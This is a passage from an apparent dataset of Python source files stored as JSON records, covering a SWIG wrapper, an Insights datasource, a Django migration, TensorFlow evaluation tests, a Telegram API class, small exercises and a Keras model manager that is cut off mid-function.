__init__(self, *args):\n this = _coarse_sun_sensor.new_CSSArraySensorIntMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSArraySensorIntMsg\n __del__ = lambda self: None\nCSSArraySensorIntMsg_swigregister = _coarse_sun_sensor.CSSArraySensorIntMsg_swigregister\nCSSArraySensorIntMsg_swigregister(CSSArraySensorIntMsg)\n\nsizeof_CSSRawDataSimMsg = _coarse_sun_sensor.sizeof_CSSRawDataSimMsg\nsizeof_EclipseSimMsg = _coarse_sun_sensor.sizeof_EclipseSimMsg\nsizeof_CSSArraySensorIntMsg = _coarse_sun_sensor.sizeof_CSSArraySensorIntMsg\nsizeof_SpicePlanetStateSimMsg = _coarse_sun_sensor.sizeof_SpicePlanetStateSimMsg\nsizeof_SCPlusStatesSimMsg = _coarse_sun_sensor.sizeof_SCPlusStatesSimMsg\n\nimport sys\nprotectAllClasses(sys.modules[__name__])\n\n# This file is compatible with both classic and new-style classes.\n\n\n"} {"ext": "py", "sha": "1a2f343b727bcfb94c084c89c7d59ea6577e7319", "content": "\"\"\"\nCustom datasources for awx_manage information\n\"\"\"\nfrom insights.core.context import HostContext\nfrom insights.core.dr import SkipComponent\nfrom insights.core.plugins import datasource\nfrom insights.core.spec_factory import DatasourceProvider, simple_command\nfrom insights.core.filters import get_filters\nfrom insights.specs import Specs\nimport json\nimport collections\n\n\nclass LocalSpecs(Specs):\n \"\"\" Local specs used only by awx_manage datasources \"\"\"\n\n awx_manage_check_license_data_raw = simple_command(\"/usr/bin/awx-manage check_license --data\")\n \"\"\" Returns the output of command ``/usr/bin/awx-manage check_license --data`` \"\"\"\n\n\n@datasource(LocalSpecs.awx_manage_check_license_data_raw, HostContext)\ndef awx_manage_check_license_data_datasource(broker):\n \"\"\"\n This datasource provides the not-sensitive information collected\n from ``/usr/bin/awx-manage check_license --data``.\n\n Typical content of ``/usr/bin/awx-manage check_license --data`` file is::\n\n {\"contact_email\": \"test@redhat.com\", \"company_name\": \"test Inc\", \"instance_count\": 100, \"license_date\": 1655092799, \"license_type\": \"enterprise\", \"subscription_name\": \"Red Hat Ansible Automation, Standard (100 Managed Nodes)\", \"sku\": \"MCT3691\", \"support_level\": \"Standard\", \"product_name\": \"Red Hat Ansible Automation Platform\", \"valid_key\": true, \"satellite\": null, \"pool_id\": \"2c92808179803e530179ea5989a157a4\", \"current_instances\": 1, \"available_instances\": 100, \"free_instances\": 99, \"time_remaining\": 29885220, \"trial\": false, \"grace_period_remaining\": 32477220, \"compliant\": true, \"date_warning\": false, \"date_expired\": false}\n\n Returns:\n str: JSON string containing non-sensitive information.\n\n Raises:\n SkipComponent: When the filter/path does not exist or any exception occurs.\n \"\"\"\n try:\n filters = get_filters(Specs.awx_manage_check_license_data)\n content = broker[LocalSpecs.awx_manage_check_license_data_raw].content\n if content and filters:\n json_data = json.loads(content[0])\n filter_result = {}\n for item in filters:\n filter_result[item] = json_data.get(item)\n if filter_result:\n return DatasourceProvider(content=json.dumps(collections.OrderedDict(sorted(filter_result.items()))), relative_path='insights_commands/awx-manage_check_license_--data')\n except Exception as e:\n raise SkipComponent(\"Unexpected exception:{e}\".format(e=str(e)))\n raise SkipComponent\n"} {"ext": "py", "sha": "1a2f356a3b1a6c66f35b4a180bfe444be0803637", "content": "# -*- coding: utf-8 -*-\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom collections import OrderedDict\nfrom typing import Dict, Type\n\nfrom .base import SecurityCenterTransport\nfrom .grpc import SecurityCenterGrpcTransport\nfrom .grpc_asyncio import SecurityCenterGrpcAsyncIOTransport\n\n\n# Compile a registry of transports.\n_transport_registry = OrderedDict() # type: Dict[str, Type[SecurityCenterTransport]]\n_transport_registry[\"grpc\"] = SecurityCenterGrpcTransport\n_transport_registry[\"grpc_asyncio\"] = SecurityCenterGrpcAsyncIOTransport\n\n__all__ = (\n \"SecurityCenterTransport\",\n \"SecurityCenterGrpcTransport\",\n \"SecurityCenterGrpcAsyncIOTransport\",\n)\n"} {"ext": "py", "sha": "1a2f357640e44f8e721169a9ad18c8e63b8bd531", "content": "# Generated by Django 3.1.7 on 2021-09-04 16:59\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BillCategory',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '1. Bill Category',\n },\n ),\n migrations.CreateModel(\n name='GenericExpenseCategory',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '6. Expense Category',\n },\n ),\n migrations.CreateModel(\n name='PaymentMethod',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ],\n options={\n 'verbose_name_plural': '0. Payment Method',\n },\n ),\n migrations.CreateModel(\n name='PayrollCategory',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '3. Payroll Category',\n },\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('occupation', models.CharField(blank=True, max_length=100, null=True)),\n ('phone', models.CharField(blank=True, max_length=10, null=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '4. Persons',\n },\n ),\n migrations.CreateModel(\n name='Payroll',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(blank=True, max_length=100, null=True)),\n ('date_expired', models.DateField()),\n ('final_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('paid_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('is_paid', models.BooleanField(default=False)),\n ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='category_payroll', to='expenses.payrollcategory')),\n ('payment_method', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='expenses.paymentmethod')),\n ('person', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='person_payroll', to='expenses.person')),\n ],\n options={\n 'verbose_name_plural': '5. Payroll',\n 'ordering': ['-date_expired'],\n },\n ),\n migrations.CreateModel(\n name='GenericExpense',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(blank=True, max_length=100, null=True)),\n ('date_expired', models.DateField()),\n ('final_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('paid_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('is_paid', models.BooleanField(default=False)),\n ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='category_expenses', to='expenses.genericexpensecategory')),\n ('payment_method', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='expenses.paymentmethod')),\n ],\n options={\n 'verbose_name_plural': '7. Generic Expenses',\n 'ordering': ['-date_expired'],\n },\n ),\n migrations.CreateModel(\n name='Bill',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(blank=True, max_length=100, null=True)),\n ('date_expired', models.DateField()),\n ('final_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('paid_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('is_paid', models.BooleanField(default=False)),\n ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='bills', to='expenses.billcategory')),\n ('payment_method', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='expenses.paymentmethod')),\n ],\n options={\n 'verbose_name_plural': '2. Bills',\n 'ordering': ['-date_expired'],\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a2f36f3b183465e4c10aefcedae56dc18b0d87f", "content": "# Python - 3.6.0\n\ntest.assert_equals(sumin(5), 55)\ntest.assert_equals(sumax(8), 372)\ntest.assert_equals(sumsum(8), 576)\ntest.assert_equals(sumin(15), 1240)\n"} {"ext": "py", "sha": "1a2f371f7afdbbb5d3272fb08bed7e871560e86e", "content": "#!/usr/bin/env python\n#\n# A library that provides a Python interface to the Telegram Bot API\n# Copyright (C) 2015-2021\n# Leandro Toledo de Souza \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser Public License for more details.\n#\n# You should have received a copy of the GNU Lesser Public License\n# along with this program. If not, see [http://www.gnu.org/licenses/].\n\"\"\"This module contains an object that represents a Telegram Location.\"\"\"\n\nfrom typing import Any\n\nfrom telegram import TelegramObject\n\n\nclass Location(TelegramObject):\n \"\"\"This object represents a point on the map.\n\n Objects of this class are comparable in terms of equality. Two objects of this class are\n considered equal, if their :attr:`longitute` and :attr:`latitude` are equal.\n\n Args:\n longitude (:obj:`float`): Longitude as defined by sender.\n latitude (:obj:`float`): Latitude as defined by sender.\n horizontal_accuracy (:obj:`float`, optional): The radius of uncertainty for the location,\n measured in meters; 0-1500.\n live_period (:obj:`int`, optional): Time relative to the message sending date, during which\n the location can be updated, in seconds. For active live locations only.\n heading (:obj:`int`, optional): The direction in which user is moving, in degrees; 1-360.\n For active live locations only.\n proximity_alert_radius (:obj:`int`, optional): Maximum distance for proximity alerts about\n approaching another chat member, in meters. For sent live locations only.\n **kwargs (:obj:`dict`): Arbitrary keyword arguments.\n\n Attributes:\n longitude (:obj:`float`): Longitude as defined by sender.\n latitude (:obj:`float`): Latitude as defined by sender.\n horizontal_accuracy (:obj:`float`): Optional. The radius of uncertainty for the location,\n measured in meters.\n live_period (:obj:`int`): Optional. Time relative to the message sending date, during which\n the location can be updated, in seconds. For active live locations only.\n heading (:obj:`int`): Optional. The direction in which user is moving, in degrees.\n For active live locations only.\n proximity_alert_radius (:obj:`int`): Optional. Maximum distance for proximity alerts about\n approaching another chat member, in meters. For sent live locations only.\n\n \"\"\"\n\n def __init__(\n self,\n longitude: float,\n latitude: float,\n horizontal_accuracy: float = None,\n live_period: int = None,\n heading: int = None,\n proximity_alert_radius: int = None,\n **_kwargs: Any,\n ):\n # Required\n self.longitude = float(longitude)\n self.latitude = float(latitude)\n\n # Optionals\n self.horizontal_accuracy = float(horizontal_accuracy) if horizontal_accuracy else None\n self.live_period = int(live_period) if live_period else None\n self.heading = int(heading) if heading else None\n self.proximity_alert_radius = (\n int(proximity_alert_radius) if proximity_alert_radius else None\n )\n\n self._id_attrs = (self.longitude, self.latitude)\n"} {"ext": "py", "sha": "1a2f3777b3029c8ffb0ee5526be2beea1d046bea", "content": "#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\n# Copyright 2020 Ozward Wang\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport struct\n\nHEADER_STRUCT_FORMAT = '!16s16s'\nN_STRUCT_FORMAT = '!H'\n\n\ndef pack_number(number):\n n_struct = struct.Struct(N_STRUCT_FORMAT)\n return n_struct.pack(number)\n\n\ndef unpack_number(data):\n n_struct = struct.Struct(N_STRUCT_FORMAT)\n return n_struct.unpack(data)[0]\n\n\ndef pack_header(leads, identity):\n s_struct = struct.Struct(HEADER_STRUCT_FORMAT)\n if isinstance(identity, str):\n identity = identity.encode('utf-8')[:16]\n else:\n identity = identity[:16]\n return s_struct.pack(leads, identity)\n\n\ndef unpack_header(header):\n s_struct = struct.Struct(HEADER_STRUCT_FORMAT)\n leads, identity = s_struct.unpack(header)\n return leads, identity\n\n\ndef pack_iv(data, iv):\n return data[:2] + iv + data[2:]\n\n\ndef unpack_iv(header):\n data = header[:2] + header[18:]\n iv = header[2:18]\n return iv, data\n\n\ndef pack_body(data, tail):\n return data + tail\n\n\ndef unpack_body(body):\n return body[:-4], body[-4:]\n\n\n\n"} {"ext": "py", "sha": "1a2f390c5688bbd1a52ab90c6fc0d7967e83b56d", "content": "\n\n#from app import app, db\nfrom app import db\nfrom sqlalchemy.orm import relationship\nimport datetime\n\nclass Post(db.Model):\n \"\"\"\n Table schema\n \"\"\"\n __tablename__ = \"posts\"\n \n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n post_id = db.Column(db.Text(), nullable=False)\n origin_blog = db.Column(db.Integer, db.ForeignKey('blogs.id'))\n date = db.Column(db.DateTime(), nullable=False)\n content = db.Column(db.Text(), nullable=False)\n title = db.Column(db.Text())\n post_url = db.Column(db.Text())\n \n blog = relationship(\"Blog\", back_populates=\"posts\")\n \n \n def __repr__(self):\n return \"Post: {}.\".format(self.title)\n \n @staticmethod\n def get_posts():\n return Post.query.order_by(Post.date.desc()).limit(10).all()\n \n\nclass Blog(db.Model):\n \"\"\"\n Blog model\n \"\"\"\n __tablename__ = \"blogs\"\n \n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n url = db.Column(db.Text())\n feed_url = db.Column(db.Text())\n last_update = db.Column(db.DateTime())\n name = db.Column(db.Text())\n posts = relationship(\"Post\", order_by=Post.id, back_populates=\"blog\")\n \n \n\n"} {"ext": "py", "sha": "1a2f3965932293b6381f41183d7f941abc26d964", "content": "# -*- coding: utf-8 -*-\n\"\"\"setup.py\"\"\"\n\nimport os\nimport sys\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\n\nclass Tox(TestCommand):\n user_options = [('tox-args=', 'a', 'Arguments to pass to tox')]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.tox_args = None\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n import tox\n import shlex\n if self.tox_args:\n errno = tox.cmdline(args=shlex.split(self.tox_args))\n else:\n errno = tox.cmdline(self.test_args)\n sys.exit(errno)\n\n\ndef read_content(filepath):\n with open(filepath) as fobj:\n return fobj.read()\n\n\nclassifiers = [\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n]\n\n\nlong_description = (\n read_content(\"README.rst\") +\n read_content(os.path.join(\"docs/source\", \"CHANGELOG.rst\")))\n\nrequires = [\n 'pyyaml', \n 'setuptools',\n 'click',\n 'sphinx-click',\n 'texttable',\n 'coverage'\n]\n\nextras_require = {\n 'reST': ['Sphinx'],\n}\n\nif os.environ.get('READTHEDOCS', None):\n extras_require['reST'].append('recommonmark')\n\nsetup(name='pymerit',\n version='0.1.0',\n description='Standardized metadata',\n long_description=long_description,\n author='Venkata Pingali',\n author_email='pingali@scribbledata.io',\n url='https://github.com/pingali/pymerit',\n classifiers=classifiers,\n packages=['pymerit'],\n data_files = [(\"\", [\"LICENSE.txt\"])],\n install_requires=requires,\n include_package_data=True,\n extras_require=extras_require,\n tests_require=['tox'],\n cmdclass={'test': Tox},\n entry_points = {\n 'console_scripts': ['merit=pymerit.cli:main'],\n }\n)\n"} {"ext": "py", "sha": "1a2f39848bdc7abd1070f4ff458db1facf4a6ebd", "content": "# Copyright 2017 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for tf.training.evaluation.\"\"\"\n\nimport os\n\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import random_seed\nfrom tensorflow.python.layers import layers\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import metrics as metrics_module\nfrom tensorflow.python.ops import state_ops\nfrom tensorflow.python.ops import variable_scope\nfrom tensorflow.python.ops.losses import losses\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.training import basic_session_run_hooks\nfrom tensorflow.python.training import evaluation\nfrom tensorflow.python.training import gradient_descent\nfrom tensorflow.python.training import monitored_session\nfrom tensorflow.python.training import saver\nfrom tensorflow.python.training import training\n\n_USE_GLOBAL_STEP = 0\n\n\ndef logistic_classifier(inputs):\n return layers.dense(inputs, 1, activation=math_ops.sigmoid)\n\n\ndef local_variable(init_value, name):\n return variable_scope.get_variable(\n name,\n dtype=dtypes.float32,\n initializer=init_value,\n trainable=False,\n collections=[ops.GraphKeys.LOCAL_VARIABLES])\n\n\nclass EvaluateOnceTest(test.TestCase):\n\n def setUp(self):\n super(EvaluateOnceTest, self).setUp()\n\n # Create an easy training set:\n np.random.seed(0)\n\n self._inputs = np.zeros((16, 4))\n self._labels = np.random.randint(0, 2, size=(16, 1)).astype(np.float32)\n\n for i in range(16):\n j = int(2 * self._labels[i] + np.random.randint(0, 2))\n self._inputs[i, j] = 1\n\n def _train_model(self, checkpoint_dir, num_steps):\n \"\"\"Trains a simple classification model.\n\n Note that the data has been configured such that after around 300 steps,\n the model has memorized the dataset (e.g. we can expect %100 accuracy).\n\n Args:\n checkpoint_dir: The directory where the checkpoint is written to.\n num_steps: The number of steps to train for.\n \"\"\"\n with ops.Graph().as_default():\n random_seed.set_random_seed(0)\n tf_inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n tf_labels = constant_op.constant(self._labels, dtype=dtypes.float32)\n\n tf_predictions = logistic_classifier(tf_inputs)\n loss_op = losses.log_loss(labels=tf_labels, predictions=tf_predictions)\n\n optimizer = gradient_descent.GradientDescentOptimizer(learning_rate=1.0)\n train_op = optimizer.minimize(loss_op,\n training.get_or_create_global_step())\n\n with monitored_session.MonitoredTrainingSession(\n checkpoint_dir=checkpoint_dir,\n hooks=[basic_session_run_hooks.StopAtStepHook(num_steps)]) as session:\n loss = None\n while not session.should_stop():\n _, loss = session.run([train_op, loss_op])\n\n if num_steps >= 300:\n assert loss < .015\n\n def testEvaluatePerfectModel(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(),\n 'evaluate_perfect_model_once')\n\n # Train a Model to completion:\n self._train_model(checkpoint_dir, num_steps=300)\n\n # Run\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n labels = constant_op.constant(self._labels, dtype=dtypes.float32)\n logits = logistic_classifier(inputs)\n predictions = math_ops.round(logits)\n\n accuracy, update_op = metrics_module.accuracy(labels, predictions)\n\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=update_op,\n final_ops={'accuracy': (accuracy, update_op)},\n hooks=[\n evaluation._StopAfterNEvalsHook(1),\n ])\n self.assertGreater(final_ops_values['accuracy'], .99)\n\n def testEvaluateWithFiniteInputs(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(),\n 'evaluate_with_finite_inputs')\n\n # Train a Model to completion:\n self._train_model(checkpoint_dir, num_steps=300)\n\n # Run evaluation. Inputs are fed through input producer for one epoch.\n all_inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n all_labels = constant_op.constant(self._labels, dtype=dtypes.float32)\n\n single_input, single_label = training.slice_input_producer(\n [all_inputs, all_labels], num_epochs=1)\n inputs, labels = training.batch([single_input, single_label], batch_size=6,\n allow_smaller_final_batch=True)\n\n logits = logistic_classifier(inputs)\n predictions = math_ops.round(logits)\n\n accuracy, update_op = metrics_module.accuracy(labels, predictions)\n\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=update_op,\n final_ops={\n 'accuracy': (accuracy, update_op),\n 'eval_steps': evaluation._get_or_create_eval_step()\n },\n hooks=[\n evaluation._StopAfterNEvalsHook(None),\n ])\n self.assertTrue(final_ops_values['accuracy'] > .99)\n # Runs evaluation for 4 iterations. First 2 evaluate full batch of 6 inputs\n # each; the 3rd iter evaluates the remaining 4 inputs, and the last one\n # triggers an error which stops evaluation.\n self.assertEqual(final_ops_values['eval_steps'], 4)\n\n def testEvalOpAndFinalOp(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(), 'eval_ops_and_final_ops')\n\n # Train a model for a single step to get a checkpoint.\n self._train_model(checkpoint_dir, num_steps=1)\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n # Create the model so we have something to restore.\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n logistic_classifier(inputs)\n\n num_evals = 5\n final_increment = 9.0\n\n my_var = local_variable(0.0, name='MyVar')\n eval_ops = state_ops.assign_add(my_var, 1.0)\n final_ops = array_ops.identity(my_var) + final_increment\n\n final_hooks = [evaluation._StopAfterNEvalsHook(num_evals),]\n initial_hooks = list(final_hooks)\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=eval_ops,\n final_ops={'value': final_ops},\n hooks=final_hooks)\n self.assertEqual(final_ops_values['value'], num_evals + final_increment)\n self.assertEqual(initial_hooks, final_hooks)\n\n def testMultiEvalStepIncrements(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(), 'eval_ops_and_final_ops')\n\n # Train a model for a single step to get a checkpoint.\n self._train_model(checkpoint_dir, num_steps=1)\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n # Create the model so we have something to restore.\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n logistic_classifier(inputs)\n\n num_evals = 6\n\n my_var = local_variable(0.0, name='MyVar')\n # In eval ops, we also increase the eval step one more time.\n eval_ops = [state_ops.assign_add(my_var, 1.0),\n state_ops.assign_add(\n evaluation._get_or_create_eval_step(), 1, use_locking=True)]\n expect_eval_update_counts = num_evals // 2\n\n final_ops = array_ops.identity(my_var)\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=eval_ops,\n final_ops={'value': final_ops},\n hooks=[evaluation._StopAfterNEvalsHook(num_evals),])\n self.assertEqual(final_ops_values['value'], expect_eval_update_counts)\n\n def testOnlyFinalOp(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(), 'only_final_ops')\n\n # Train a model for a single step to get a checkpoint.\n self._train_model(checkpoint_dir, num_steps=1)\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n # Create the model so we have something to restore.\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n logistic_classifier(inputs)\n\n final_increment = 9.0\n\n my_var = local_variable(0.0, name='MyVar')\n final_ops = array_ops.identity(my_var) + final_increment\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path, final_ops={'value': final_ops})\n self.assertEqual(final_ops_values['value'], final_increment)\n\n\nif __name__ == '__main__':\n test.main()\n"} {"ext": "py", "sha": "1a2f39b527b64a4f5dc39a9b4f4a86f5fc710033", "content": "class Solution:\n def decodeCiphertext(self, encodedText: str, rows: int) -> str:\n n = len(encodedText)\n cols = n // rows\n\n ans = []\n matrix = [[' '] * cols for _ in range(rows)]\n\n for i in range(rows):\n for j in range(cols):\n matrix[i][j] = encodedText[i * cols + j]\n\n for col in range(cols):\n i = 0\n j = col\n while i < rows and j < cols:\n ans.append(matrix[i][j])\n i += 1\n j += 1\n\n return ''.join(ans).rstrip()\n"} {"ext": "py", "sha": "1a2f39cc0bde5b4bee29b348df8d7c8b3c876311", "content": "import sqlite3\n\nconn = sqlite3.connect('emaildb.sqlite')\ncur = conn.cursor()\n\ncur.execute('''\nDROP TABLE IF EXISTS Counts''')\n\ncur.execute('''\nCREATE TABLE Counts (email TEXT, count INTEGER)''')\n\nfname = raw_input('Enter file name: ')\nif ( len(fname) < 1 ) : fname = 'mbox-short.txt'\nfh = open(fname)\nfor line in fh:\n if not line.startswith('From: ') : continue\n pieces = line.split()\n email = pieces[1]\n email = email.split(\"@\",1)[1]\n dir(email)\n #print email\n cur.execute('SELECT count FROM Counts WHERE email = ? ', (email, ))\n row = cur.fetchone()\n if row is None:\n cur.execute('''INSERT INTO Counts (email, count) \n VALUES ( ?, 1 )''', ( email, ) )\n else : \n cur.execute('UPDATE Counts SET count=count+1 WHERE email = ?', \n (email, ))\n # This statement commits outstanding changes to disk each \n # time through the loop - the program can be made faster \n # by moving the commit so it runs only after the loop completes\n conn.commit()\n\n# https://www.sqlite.org/lang_select.html\nsqlstr = 'SELECT email, count FROM Counts ORDER BY count DESC'\n\nprint \"Counts:\"\nfor row in cur.execute(sqlstr) :\n print str(row[0]), row[1]\n\ncur.close()\n\n"} {"ext": "py", "sha": "1a2f3a32f18a9cbadd9eb5bd3299cb2ea83b186e", "content": "import os\nimport re\nimport numpy as np\nfrom PIL import Image\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nfrom sklearn.preprocessing import LabelEncoder\n\nclass ModelManager():\n def __init__(self, db, s3, graph, backup_model, backup_label_encoder, collection_name='models', bucket_name='models'):\n self.conn = db[collection_name]\n self.s3_bucket = s3.Bucket(bucket_name)\n self.label_encoder = LabelEncoder()\n self.model = None\n self.backup_model = backup_model\n self.backup_label_encoder = backup_label_encoder\n self.graph = graph\n\n def predict(self, image_array):\n \"\"\"Function that accepts a model and image_array and returns a prediction.\"\"\"\n if self.model:\n with self.graph.as_default():\n out = self.model.predict_classes(image_array)\n return self.label_encoder.inverse_transform(out)\n with self.graph.as_default():\n out = self.backup_model.predict_classes(image_array)\n return self.backup_label_encoder.inverse_transform(out)\n \n def preprocess(self, image_file):\n \"\"\"Preprocess the given image file by resizing and turning it into an array.\"\"\"\n img = Image.open(image_file)\n image_resize = img.resize((40, 24))\n image = img_to_array(image_resize)\n x = image.reshape(1, 40, 24, 1)\n return x / 255\n\n def load(self, model_path, label_encoder_path):\n \"\"\"Load a fitted model from the local filesystem into memory. \"./models/classes.npy\"\"\"\n self.label_encoder.classes_ = np.load(label_encoder_path)\n self.model = load_model(model_path)\n\n def load_latest_model(self):\n \"\"\"Load a fitted model from a remote filesystem into memory.\"\"\"\n latest_model = list(self.conn.find({'stage': 'PRODUCTION'}).sort([(\"version\", -1)]).limit(1))\n if len(latest_model) == 0:\n return\n\n latest_model = latest_model[0]\n if 'MODEL_NAME' in os.environ and latest_model['name'] == os.environ['MODEL_NAME']:\n if 'MODEL_VERSION' in os.environ and str(latest_model['version']) == os.environ['MODEL_VERSION']:\n return\n\n for f in os.listdir('./models'):\n if not f.endswith(\".h5\") and not f.endswith(\".npy\"):\n continue\n os.remove(os.path.join('./models', f))\n \n # Download model h5 file\n model = re.sub('name', latest_model['name'], latest_model['naming_format'])\n model = re.sub('0', str(latest_model['version']), model)\n self.s3_bucket.download_file(model, f'./models/{model}')\n\n # Download model classes npy file\n classes = re.sub('name', latest_model['name'], latest_model['naming_format'])\n classes = re.sub('0', str(latest_model['version']), classes)\n classes = re.sub('h5', 'npy', classes)\n self.s3_bucket.download_file(classes, f'./models/{classes}')\n os.environ['MODEL_NAME'] = latest_model['name']\n os.environ['MODEL_VERSION'] = str(latest_model['version'])\n\n def get_latest_online_model_version(self):\n initial_model = list(self.conn.find({\"name\": 'online-model'}).sort([(\"version\", -1)]).limit(1))[0]\n return initial_model.version if initial_model else 0\n\n def _insert(self, name, version, metrics_str, naming_format, stage):\n model_doc = {\n \"name\": name, \n \"version\": version, \n \"naming_format\": naming_format,\n \"metrics\": metrics_str, \n \"stage\": stage\n }\n self.conn.insert_one(model_doc)\n\n def publish_model(self, model_path, classes_path, name, metrics):\n latest_model = list(self.conn.find({'stage': 'PRODUCTION', 'name': name}).sort([(\"version\", -1)]).limit(1))\n # Save model file to AWS S3 bucket \n version = 1\n if len(latest_model) > 0:\n version = latest_model[0].version + 1\n\n self.s3_bucket.upload_file(Filename=model_path, Key=f'{name}-v{version}.h5')\n 